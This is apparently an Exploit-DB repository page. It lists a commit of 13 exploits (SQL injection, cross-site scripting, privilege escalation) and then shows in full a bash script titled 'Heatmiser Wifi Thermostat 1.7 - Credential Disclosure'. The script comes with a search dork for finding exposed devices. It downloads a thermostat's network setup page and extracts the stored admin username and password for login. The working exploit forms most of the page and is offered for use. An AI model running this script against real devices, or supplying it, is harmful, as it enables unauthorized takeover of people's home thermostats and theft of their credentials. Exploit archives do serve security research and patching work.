712d629b6b
13 changes to exploits/shellcodes Microsoft Windows - 'FSCTL_FIND_FILES_BY_SID' Information Disclosure Solaris - RSH Stack Clash Privilege Escalation (Metasploit) VLC Media Player - MKV Use-After-Free (Metasploit) HotelDruid 2.2.4 - 'anno' SQL Injection Navigate CMS 2.8.5 - Arbitrary File Download Library CMS 2.1.1 - Cross-Site Scripting Kados R10 GreenBee - 'release_id' SQL Injection Vishesh Auto Index 3.1 - 'fid' SQL Injection WordPress Plugin Support Board 1.2.3 - Cross-Site Scripting Rukovoditel Project Management CRM 2.3 - 'path' SQL Injection MV Video Sharing Software 1.2 - 'searchname' SQL Injection GIU Gallery Image Upload 0.3.1 - 'category' SQL Injection Heatmiser Wifi Thermostat 1.7 - Credential Disclosure
27 lines
No EOL
1.1 KiB
Bash
Executable file
27 lines
No EOL
1.1 KiB
Bash
Executable file
# Exploit Title: Heatmiser Wifi Thermostat 1.7 - Credential Disclosure
|
|
# Dork: intitle:"Heatmiser Wifi Thermostat"
|
|
# Date: 2018-08-17
|
|
# Exploit Author: d0wnp0ur
|
|
# Original Discoverer: Andrew Tierney
|
|
# Vendor Lnk: https://www.heatmiser.com/en/
|
|
# Product Link: https://www.heatmiser.com/en/wireless-thermostats/
|
|
# Tested on: Heatmiser Version 1.7
|
|
# CVE: N/A
|
|
|
|
#!/bin/bash
|
|
|
|
echo Heatmiser Smart Thermometer Hack
|
|
echo By d0wnp0ur
|
|
echo Usage: $0 \<ip\[:port\]\> \(Default is 80. If it doesn\'t work, try port 8081\)
|
|
echo This tool gets the username and password of a vulnerable Heatmiser thermostat
|
|
echo Deleting old files
|
|
rm networkSetup.htm*
|
|
echo Copying disclosing page
|
|
wget http://$1/networkSetup.htm
|
|
echo Getting Username and Password
|
|
echo Username:
|
|
cat networkSetup.htm | grep "User" | grep "Name:" | awk -F 'value=' '{print $2}' | cut -d '"' -f 2
|
|
echo Password:
|
|
cat networkSetup.htm | grep "User" | grep "Password:" |grep -v -i "confirm" | awk -F 'value=' '{print $2}' | cut -d '"' -f 2
|
|
echo Success! Log in to the web interface with the above credentials.
|
|
echo http://$1 |